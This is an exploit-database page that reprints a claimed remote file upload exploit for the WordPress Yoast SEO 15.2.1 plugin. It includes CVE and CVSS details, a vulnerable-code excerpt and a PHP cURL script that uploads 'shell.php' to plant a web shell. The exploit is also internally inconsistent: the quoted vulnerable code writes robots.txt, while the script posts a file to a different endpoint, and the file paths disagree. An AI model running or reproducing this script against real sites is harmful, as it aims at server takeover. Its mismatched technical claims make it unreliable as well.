Advertisement






Wordpress Plugin Yoast SEO 15.2.1 - Remote File Upload

CVE Category Price Severity
CVE-2021-24294 CWE-434 $5,000 - $25,000 High
Author Risk Exploitation Type Date
Hezi Shimon High Remote 2020-11-11
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.8 0.95

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020110084

Below is a copy:

Wordpress Plugin Yoast SEO 15.2.1 - Remote File Upload
* Exploit Title: Wordpress Plugin Yoast SEO 15.2.1 - Remote File Upload
* Google Dork: N/A
* Date: 2020.11.10
* Exploit Author: OmideMehraban
* Vendor Homepage: https://wordpress.org/plugins/wordpress-seo
* Software Link: https://wordpress.org/plugins/wordpress-seo
* Category : webapps
* Version: 15.2.1
* Tested on: windows 10 , firefox
* CVE : N/A

Vulnerable Source:
  61: fwrite fwrite($f, $robotsnew); 
  60: $f = fopen($robots_file, 'w+'); 
  21: $robots_file = $home_path . 'robots.txt'; 
  18: $home_path = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR;  // if(!is_writable($home_path) && !empty($_SERVER)), 
  15: $home_path = get_home_path(); 
  58: $robotsnew = sanitize_textarea_field(wp_unslash($_POST['robotsnew'])); 
        requires:
  45: if(isset($_POST['submitrobots']))
  57: if(isset($_POST['robotsnew']) && file_exists($robots_file))
  59: if(is_writable($robots_file))

Exploit:
<?php
$Omid="shell.php";
$ch = curl_init("http://localhost/wordpress/wp-content/admin/views/tool-file-editor.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$Omid"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>

Location File:
http://localhost/wordpress/wp-content/plugins/admin/views/tool-file-editor.php/Shell.php;.jpg

********************************************************* 
* Discovered By OmideMehraban
* Instagram: @omidemehraban
* Telegram: @omiid
********************************************************* 

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.